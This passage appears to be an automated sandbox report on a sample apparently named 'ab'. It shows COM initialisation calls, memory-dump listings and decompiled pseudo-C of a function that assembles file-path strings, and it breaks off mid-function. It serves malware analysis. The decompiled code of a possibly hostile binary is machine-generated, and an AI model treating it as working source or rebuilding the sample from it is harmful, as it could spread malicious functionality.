0x01315b26
0x01315b29
0x01315b32
0x01315b36
0x01315b3b
0x01315b3b
0x01315b46
0x01315b4b
0x01315b4f
0x01315b55
0x01315b8e
0x01315b90
0x01315b93
0x01315b57
0x01315b57
0x01315b5e
0x01315b65
0x01315b68
0x01315b6b
0x01315b70
0x01315b77
0x01315b7e
0x01315b85
0x01315b88
0x01315b88
0x01315b98
0x01315b9e
0x01315ba7
0x01315bab
0x01315bb0
0x01315b9e
0x01315bb7
0x01315bcf
0x01315bda
0x01315be7

APIs

CoInitializeEx.OLE32(00000000,00000000,39CCA9F6,?,00000000,00000000,013683EB,000000FF,?,01314792,00000000), ref: 01315BB7
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,01314792,00000000), ref: 01315BCF

Part of subcall function 012F54C0: Concurrency::cancel_current_task.LIBCPMT ref: 012F562A

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Initialize$Concurrency::cancel_current_taskSecurity
String ID:
API String ID: 1505598098-0
Opcode ID: d6f290eb755cb1982142301403040056092c4a2872bc07fa544603cae4568c6e
Instruction ID: 6380c09fe1e62c5e56717035aeaa3e4b73da38d41cf841bb77cf4def56e2a33c
Opcode Fuzzy Hash: d6f290eb755cb1982142301403040056092c4a2872bc07fa544603cae4568c6e
Instruction Fuzzy Hash: F8128C70810745DFE709CF28D954BAABB70FF51308F50069CD4052B5A2D776EA95CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0130ACE0, Relevance: 2.8, Strings: 1, Instructions: 1586
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E0130ACE0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, char _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				intOrPtr _v84;
				void _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				short _v140;
				signed int _v144;
				intOrPtr _v148;
				short _v164;
				signed int _v168;
				intOrPtr _v172;
				short _v188;
				char _v192;
				signed int _v196;
				intOrPtr _v200;
				short _v216;
				signed int _v220;
				char _v240;
				intOrPtr* _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr _v256;
				short _v272;
				void* __esi;
				void* __ebp;
				signed int _t806;
				signed int _t807;
				void* _t815;
				void* _t816;
				void* _t817;
				short* _t818;
				signed int _t820;
				signed int _t822;
				signed int _t824;
				signed int _t826;
				signed int _t828;
				void* _t830;
				void* _t831;
				short* _t832;
				signed int _t834;
				signed int _t836;
				signed int _t838;
				signed int _t840;
				void* _t842;
				void* _t843;
				short* _t844;
				signed int _t846;
				signed int _t848;
				signed int _t850;
				signed int _t852;
				void* _t853;
				short* _t854;
				signed int _t856;
				signed int _t858;
				void* _t859;
				short* _t860;
				signed int _t862;
				signed int _t864;
				void* _t865;
				short* _t866;
				signed int _t868;
				signed int _t870;
				void* _t872;
				void* _t873;
				short* _t874;
				signed int _t876;
				signed int _t878;
				signed int _t880;
				signed int _t882;
				void* _t883;
				short* _t884;
				signed int _t886;
				signed int _t888;
				void* _t889;
				short* _t890;
				signed int _t892;
				signed int _t894;
				short* _t895;
				signed int _t897;
				short* _t898;
				signed int _t900;
				short* _t901;
				signed int _t903;
				short* _t904;
				signed int _t906;
				short* _t907;
				signed int _t909;
				short* _t910;
				signed int _t912;
				void* _t914;
				void* _t915;
				void* _t916;
				void* _t917;
				short* _t918;
				signed int _t920;
				signed int _t922;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t930;
				void* _t932;
				void* _t933;
				short* _t934;
				char _t935;
				signed int _t937;
				signed int _t939;
				signed int _t941;
				signed int _t943;
				void* _t945;
				void* _t946;
				short* _t947;
				char _t948;
				signed int _t950;
				signed int _t952;
				signed int _t954;
				signed int _t956;
				void* _t958;
				void* _t959;
				short* _t960;
				char _t961;
				signed int _t963;
				signed int _t965;
				signed int _t967;
				signed int _t969;
				void* _t971;
				void* _t972;
				short* _t973;
				char _t974;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t982;
				void* _t984;
				void* _t985;
				short* _t986;
				char _t987;
				signed int _t989;
				signed int _t991;
				signed int _t993;
				signed int _t995;
				void* _t996;
				void* _t997;
				void* _t998;
				short* _t999;
				signed int _t1001;
				signed int _t1003;
				signed int _t1005;
				signed int _t1007;
				char* _t1019;
				void* _t1020;
				void* _t1164;
				intOrPtr* _t1166;
				intOrPtr _t1174;
				intOrPtr _t1180;
				intOrPtr _t1186;
				intOrPtr _t1190;
				intOrPtr _t1194;
				intOrPtr _t1198;
				intOrPtr _t1204;
				intOrPtr _t1208;
				intOrPtr _t1212;
				intOrPtr _t1215;
				intOrPtr _t1218;
				intOrPtr _t1221;
				intOrPtr _t1224;
				intOrPtr _t1227;
				intOrPtr _t1230;
				intOrPtr _t1238;
				short* _t1244;
				short* _t1250;
				short* _t1256;
				short* _t1262;
				short* _t1268;
				intOrPtr _t1274;
				short* _t1283;
				void* _t1311;
				intOrPtr _t1355;
				intOrPtr _t1360;
				intOrPtr _t1365;
				intOrPtr _t1370;
				intOrPtr _t1375;
				intOrPtr* _t1387;
				intOrPtr* _t1391;
				void* _t1404;
				char _t1405;
				void* _t1406;
				signed int _t1407;
				void* _t1408;
				intOrPtr* _t1410;
				void* _t1411;
				void* _t1412;
				void* _t1413;
				void* _t1414;
				void* _t1415;
				void* _t1416;
				void* _t1417;
				void* _t1418;
				void* _t1419;
				void* _t1420;
				void* _t1421;
				void* _t1512;

				_t1311 = __edx;
				_t1164 = __ebx;
				_push(0xffffffff);
				_push(0x13672a7);
				_push( *[fs:0x0]);
				_t806 =  *0x13a4018; // 0x39cca9f6
				_t807 = _t806 ^ _t1407;
				_v20 = _t807;
				_push(__edi);
				_push(_t807);
				 *[fs:0x0] =  &_v16;
				_t1391 = __ecx;
				_v192 = __ecx;
				_v248 = __ecx;
				_v244 = __ecx;
				_push(5);
				_t1410 = _t1408 - 0xf8;
				_v8 = 0;
				_t1166 = _t1410;
				 *_t1166 = 0;
				 *((intOrPtr*)(_t1166 + 4)) = 0;
				_t1423 = _a8;
				if(_a8 != 0) {
					asm("lock inc dword [eax+0x4]");
				}
				 *_t1166 = _a4;
				 *((intOrPtr*)(_t1166 + 4)) = _a8;
				E01303AA0(_t1391, _t1311);
				 *_t1391 = 0x1396b90;
				 *((intOrPtr*)(_t1391 + 0x18)) = 0;
				 *((intOrPtr*)(_t1391 + 0x1c)) = 0;
				 *((intOrPtr*)(_t1391 + 0x20)) = 0;
				_t1387 = _t1391 + 0x24;
				 *_t1387 = 0;
				 *((intOrPtr*)(_t1387 + 4)) = 0;
				 *((intOrPtr*)(_t1387 + 8)) = 0;
				 *((intOrPtr*)(_t1391 + 0x30)) = 0;
				 *((intOrPtr*)(_t1391 + 0x34)) = 0;
				 *((intOrPtr*)(_t1391 + 0x38)) = 0;
				 *((intOrPtr*)(_t1391 + 0x3c)) = 0;
				 *((intOrPtr*)(_t1391 + 0x40)) = 0;
				 *((intOrPtr*)(_t1391 + 0x44)) = 0;
				 *((intOrPtr*)(_t1391 + 0x48)) = 0;
				 *((intOrPtr*)(_t1391 + 0x4c)) = 0;
				 *((intOrPtr*)(_t1391 + 0x50)) = 0;
				 *((intOrPtr*)(_t1391 + 0x64)) = 0;
				 *(_t1391 + 0x68) = 7;
				 *((short*)(_t1391 + 0x54)) = 0;
				 *((intOrPtr*)(_t1391 + 0x7c)) = 0;
				 *(_t1391 + 0x80) = 7;
				 *((short*)(_t1391 + 0x6c)) = 0;
				_v8 = 8;
				_t1392 = E012F93F0( &_v164, 0x13a5d6c, _t1387, _t1423);
				_v8 = 9;
				_t815 = E012F93F0( &_v140, 0x13a5bec, _t1387, _t1423);
				_v8 = 0xa;
				_t816 = E0130A920(_t1164,  &_v188, _t815, _t1387);
				_v8 = 0xb;
				_t817 = E012FC470( &_v216, _t816, _t814);
				_v8 = 0xc;
				_t818 = E012F8470( &_v272, _t817, "\\");
				_t1411 = _t1410 + 8;
				_v8 = 0xd;
				_t1174 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1174 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t818);
					E012F54C0(_t1164, _t1387, _t1387, _t1392, _t1174);
				} else {
					 *((intOrPtr*)(_t1174 + 0x10)) = 0;
					 *((intOrPtr*)(_t1174 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t818 + 0x10)) = 0;
					 *(_t818 + 0x14) = 7;
					 *_t818 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t820 = _v252;
				if(_t820 >= 8) {
					_push(2 + _t820 * 2);
					E012F56A0(_t1164, _t1387, _v272);
					_t1411 = _t1411 + 8;
				}
				_v256 = 0;
				_v272 = 0;
				_t822 = _v196;
				_v252 = 7;
				if(_t822 >= 8) {
					_push(2 + _t822 * 2);
					E012F56A0(_t1164, _t1387, _v216);
					_t1411 = _t1411 + 8;
				}
				_v200 = 0;
				_v216 = 0;
				_t824 = _v168;
				_v196 = 7;
				if(_t824 >= 8) {
					_push(2 + _t824 * 2);
					E012F56A0(_t1164, _t1387, _v188);
					_t1411 = _t1411 + 8;
				}
				_v172 = 0;
				_v188 = 0;
				_t826 = _v120;
				_v168 = 7;
				if(_t826 >= 8) {
					_push(2 + _t826 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1411 = _t1411 + 8;
				}
				_v8 = 8;
				_v140 = 0;
				_t828 = _v144;
				_v124 = 0;
				_v120 = 7;
				_t1429 = _t828 - 8;
				if(_t828 >= 8) {
					_push(2 + _t828 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1411 = _t1411 + 8;
				}
				_t1393 = E012F93F0( &_v164, 0x13a5e14, _t1387, _t1429);
				_v8 = 0xe;
				_t830 = E012F93F0( &_v216, 0x13a5bec, _t1387, _t1429);
				_v8 = 0xf;
				_t831 = E0130A920(_t1164,  &_v188, _t830, _t1387);
				_v8 = 0x10;
				_t832 = E012FC470( &_v140, _t831, _t829);
				_t1412 = _t1411 + 4;
				_v8 = 0x11;
				_t1180 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1180 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t832);
					E012F54C0(_t1164, _t1387, _t1387, _t1393, _t1180);
				} else {
					 *((intOrPtr*)(_t1180 + 0x10)) = 0;
					 *((intOrPtr*)(_t1180 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t832 + 0x10)) = 0;
					 *(_t832 + 0x14) = 7;
					 *_t832 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t834 = _v120;
				if(_t834 >= 8) {
					_push(2 + _t834 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1412 = _t1412 + 8;
				}
				_v124 = 0;
				_v140 = 0;
				_t836 = _v168;
				_v120 = 7;
				if(_t836 >= 8) {
					_push(2 + _t836 * 2);
					E012F56A0(_t1164, _t1387, _v188);
					_t1412 = _t1412 + 8;
				}
				_v172 = 0;
				_v188 = 0;
				_t838 = _v196;
				_v168 = 7;
				if(_t838 >= 8) {
					_push(2 + _t838 * 2);
					E012F56A0(_t1164, _t1387, _v216);
					_t1412 = _t1412 + 8;
				}
				_v8 = 8;
				_v216 = 0;
				_t840 = _v144;
				_v200 = 0;
				_v196 = 7;
				_t1434 = _t840 - 8;
				if(_t840 >= 8) {
					_push(2 + _t840 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1412 = _t1412 + 8;
				}
				_t1394 = E012F93F0( &_v164, 0x13a5d9c, _t1387, _t1434);
				_v8 = 0x12;
				_t842 = E012F93F0( &_v216, 0x13a5bec, _t1387, _t1434);
				_v8 = 0x13;
				_t843 = E0130A920(_t1164,  &_v188, _t842, _t1387);
				_v8 = 0x14;
				_t844 = E012FC470( &_v140, _t843, _t841);
				_t1413 = _t1412 + 4;
				_v8 = 0x15;
				_t1186 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1186 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t844);
					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1186);
				} else {
					 *((intOrPtr*)(_t1186 + 0x10)) = 0;
					 *((intOrPtr*)(_t1186 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t844 + 0x10)) = 0;
					 *(_t844 + 0x14) = 7;
					 *_t844 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t846 = _v120;
				if(_t846 >= 8) {
					_push(2 + _t846 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1413 = _t1413 + 8;
				}
				_v124 = 0;
				_v140 = 0;
				_t848 = _v168;
				_v120 = 7;
				if(_t848 >= 8) {
					_push(2 + _t848 * 2);
					E012F56A0(_t1164, _t1387, _v188);
					_t1413 = _t1413 + 8;
				}
				_v172 = 0;
				_v188 = 0;
				_t850 = _v196;
				_v168 = 7;
				if(_t850 >= 8) {
					_push(2 + _t850 * 2);
					E012F56A0(_t1164, _t1387, _v216);
					_t1413 = _t1413 + 8;
				}
				_v8 = 8;
				_v216 = 0;
				_t852 = _v144;
				_v200 = 0;
				_v196 = 7;
				_t1439 = _t852 - 8;
				if(_t852 >= 8) {
					_push(2 + _t852 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1413 = _t1413 + 8;
				}
				_t853 = E012F93F0( &_v164, 0x13a5c34, _t1387, _t1439);
				_v8 = 0x16;
				_t854 = E0130A920(_t1164,  &_v140, _t853, _t1387);
				_v8 = 0x17;
				_t1190 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1190 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t854);
					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1190);
				} else {
					 *((intOrPtr*)(_t1190 + 0x10)) = 0;
					 *((intOrPtr*)(_t1190 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t854 + 0x10)) = 0;
					 *(_t854 + 0x14) = 7;
					 *_t854 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t856 = _v120;
				if(_t856 >= 8) {
					_push(2 + _t856 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1413 = _t1413 + 8;
				}
				_v8 = 8;
				_v140 = 0;
				_t858 = _v144;
				_v124 = 0;
				_v120 = 7;
				_t1442 = _t858 - 8;
				if(_t858 >= 8) {
					_push(2 + _t858 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1413 = _t1413 + 8;
				}
				_t859 = E012F93F0( &_v164, 0x13a5c4c, _t1387, _t1442);
				_v8 = 0x18;
				_t860 = E0130A920(_t1164,  &_v140, _t859, _t1387); // executed
				_v8 = 0x19;
				_t1194 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1194 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t860);
					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1194);
				} else {
					 *((intOrPtr*)(_t1194 + 0x10)) = 0;
					 *((intOrPtr*)(_t1194 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t860 + 0x10)) = 0;
					 *(_t860 + 0x14) = 7;
					 *_t860 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t862 = _v120;
				if(_t862 >= 8) {
					_push(2 + _t862 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1413 = _t1413 + 8;
				}
				_v8 = 8;
				_v140 = 0;
				_t864 = _v144;
				_v124 = 0;
				_v120 = 7;
				_t1445 = _t864 - 8;
				if(_t864 >= 8) {
					_push(2 + _t864 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1413 = _t1413 + 8;
				}
				_t865 = E012F93F0( &_v164, 0x13a5e8c, _t1387, _t1445);
				_v8 = 0x1a;
				_t866 = E0130A920(_t1164,  &_v140, _t865, _t1387);
				_v8 = 0x1b;
				_t1198 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1198 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t866);
					E012F54C0(_t1164, _t1387, _t1387, _t1394, _t1198);
				} else {
					 *((intOrPtr*)(_t1198 + 0x10)) = 0;
					 *((intOrPtr*)(_t1198 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t866 + 0x10)) = 0;
					 *(_t866 + 0x14) = 7;
					 *_t866 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t868 = _v120;
				if(_t868 >= 8) {
					_push(2 + _t868 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1413 = _t1413 + 8;
				}
				_v8 = 8;
				_v140 = 0;
				_t870 = _v144;
				_v124 = 0;
				_v120 = 7;
				_t1448 = _t870 - 8;
				if(_t870 >= 8) {
					_push(2 + _t870 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1413 = _t1413 + 8;
				}
				_t1395 = E012F93F0( &_v164, 0x13a5b2c, _t1387, _t1448);
				_v8 = 0x1c;
				_t872 = E012F93F0( &_v216, 0x13a5c1c, _t1387, _t1448);
				_v8 = 0x1d;
				_t873 = E0130A920(_t1164,  &_v188, _t872, _t1387);
				_v8 = 0x1e;
				_t874 = E012FC470( &_v140, _t873, _t871);
				_t1414 = _t1413 + 4;
				_v8 = 0x1f;
				_t1204 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1204 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t874);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1204);
				} else {
					 *((intOrPtr*)(_t1204 + 0x10)) = 0;
					 *((intOrPtr*)(_t1204 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t874 + 0x10)) = 0;
					 *(_t874 + 0x14) = 7;
					 *_t874 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t876 = _v120;
				if(_t876 >= 8) {
					_push(2 + _t876 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1414 = _t1414 + 8;
				}
				_v124 = 0;
				_v140 = 0;
				_t878 = _v168;
				_v120 = 7;
				if(_t878 >= 8) {
					_push(2 + _t878 * 2);
					E012F56A0(_t1164, _t1387, _v188);
					_t1414 = _t1414 + 8;
				}
				_v172 = 0;
				_v188 = 0;
				_t880 = _v196;
				_v168 = 7;
				if(_t880 >= 8) {
					_push(2 + _t880 * 2);
					E012F56A0(_t1164, _t1387, _v216);
					_t1414 = _t1414 + 8;
				}
				_v8 = 8;
				_v216 = 0;
				_t882 = _v144;
				_v200 = 0;
				_v196 = 7;
				_t1453 = _t882 - 8;
				if(_t882 >= 8) {
					_push(2 + _t882 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t883 = E012F93F0( &_v164, 0x13a5f34, _t1387, _t1453);
				_v8 = 0x20;
				_t884 = E0130A920(_t1164,  &_v140, _t883, _t1387);
				_v8 = 0x21;
				_t1208 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1208 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t884);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1208);
				} else {
					 *((intOrPtr*)(_t1208 + 0x10)) = 0;
					 *((intOrPtr*)(_t1208 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t884 + 0x10)) = 0;
					 *(_t884 + 0x14) = 7;
					 *_t884 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t886 = _v120;
				if(_t886 >= 8) {
					_push(2 + _t886 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1414 = _t1414 + 8;
				}
				_v8 = 8;
				_v140 = 0;
				_t888 = _v144;
				_v124 = 0;
				_v120 = 7;
				_t1456 = _t888 - 8;
				if(_t888 >= 8) {
					_push(2 + _t888 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t889 = E012F93F0( &_v164, 0x13a606c, _t1387, _t1456);
				_v8 = 0x22;
				_t890 = E0130A920(_t1164,  &_v140, _t889, _t1387);
				_v8 = 0x23;
				_t1212 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1212 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t890);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1212);
				} else {
					 *((intOrPtr*)(_t1212 + 0x10)) = 0;
					 *((intOrPtr*)(_t1212 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t890 + 0x10)) = 0;
					 *(_t890 + 0x14) = 7;
					 *_t890 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_t892 = _v120;
				if(_t892 >= 8) {
					_push(2 + _t892 * 2);
					E012F56A0(_t1164, _t1387, _v140);
					_t1414 = _t1414 + 8;
				}
				_v8 = 8;
				_v140 = 0;
				_t894 = _v144;
				_v124 = 0;
				_v120 = 7;
				_t1459 = _t894 - 8;
				if(_t894 >= 8) {
					_push(2 + _t894 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t895 = E012F93F0( &_v164, 0x13a5a6c, _t1387, _t1459);
				_v8 = 0x24;
				_t1215 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1215 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t895);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1215);
				} else {
					 *((intOrPtr*)(_t1215 + 0x10)) = 0;
					 *((intOrPtr*)(_t1215 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t895 + 0x10)) = 0;
					 *(_t895 + 0x14) = 7;
					 *_t895 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_v8 = 8;
				_t897 = _v144;
				_t1461 = _t897 - 8;
				if(_t897 >= 8) {
					_push(2 + _t897 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t898 = E012F93F0( &_v164, 0x13a5dcc, _t1387, _t1461);
				_v8 = 0x25;
				_t1218 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1218 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t898);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1218);
				} else {
					 *((intOrPtr*)(_t1218 + 0x10)) = 0;
					 *((intOrPtr*)(_t1218 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t898 + 0x10)) = 0;
					 *(_t898 + 0x14) = 7;
					 *_t898 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_v8 = 8;
				_t900 = _v144;
				_t1463 = _t900 - 8;
				if(_t900 >= 8) {
					_push(2 + _t900 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t901 = E012F93F0( &_v164, 0x13a5ea4, _t1387, _t1463);
				_v8 = 0x26;
				_t1221 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1221 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t901);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1221);
				} else {
					 *((intOrPtr*)(_t1221 + 0x10)) = 0;
					 *((intOrPtr*)(_t1221 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t901 + 0x10)) = 0;
					 *(_t901 + 0x14) = 7;
					 *_t901 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_v8 = 8;
				_t903 = _v144;
				_t1465 = _t903 - 8;
				if(_t903 >= 8) {
					_push(2 + _t903 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t904 = E012F93F0( &_v164, 0x13a5d3c, _t1387, _t1465);
				_v8 = 0x27;
				_t1224 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1224 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t904);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1224);
				} else {
					 *((intOrPtr*)(_t1224 + 0x10)) = 0;
					 *((intOrPtr*)(_t1224 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t904 + 0x10)) = 0;
					 *(_t904 + 0x14) = 7;
					 *_t904 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_v8 = 8;
				_t906 = _v144;
				_t1467 = _t906 - 8;
				if(_t906 >= 8) {
					_push(2 + _t906 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t907 = E012F93F0( &_v164, 0x13a5f34, _t1387, _t1467);
				_v8 = 0x28;
				_t1227 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1227 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t907);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1227);
				} else {
					 *((intOrPtr*)(_t1227 + 0x10)) = 0;
					 *((intOrPtr*)(_t1227 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t907 + 0x10)) = 0;
					 *(_t907 + 0x14) = 7;
					 *_t907 = 0;
					 *((intOrPtr*)(_t1387 + 4)) =  *((intOrPtr*)(_t1387 + 4)) + 0x18;
				}
				_v8 = 8;
				_t909 = _v144;
				_t1469 = _t909 - 8;
				if(_t909 >= 8) {
					_push(2 + _t909 * 2);
					E012F56A0(_t1164, _t1387, _v164);
					_t1414 = _t1414 + 8;
				}
				_t910 = E012F93F0( &_v164, 0x13a5db4, _t1387, _t1469);
				_v8 = 0x29;
				_t1230 =  *((intOrPtr*)(_t1387 + 4));
				if(_t1230 ==  *((intOrPtr*)(_t1387 + 8))) {
					_push(_t910);
					E012F54C0(_t1164, _t1387, _t1387, _t1395, _t1230);
				} else {
					 *((intOrPtr*)(_t1230 + 0x10)) = 0;
					 *((intOrPtr*)(_t1230 + 0x14)) = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ecx], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ecx+0x10], xmm0");
					 *((intOrPtr*)(_t910 + 0x10)) = 0;
					 *(_t910 + 0x14) = 7;
					 *_t910 = 0;
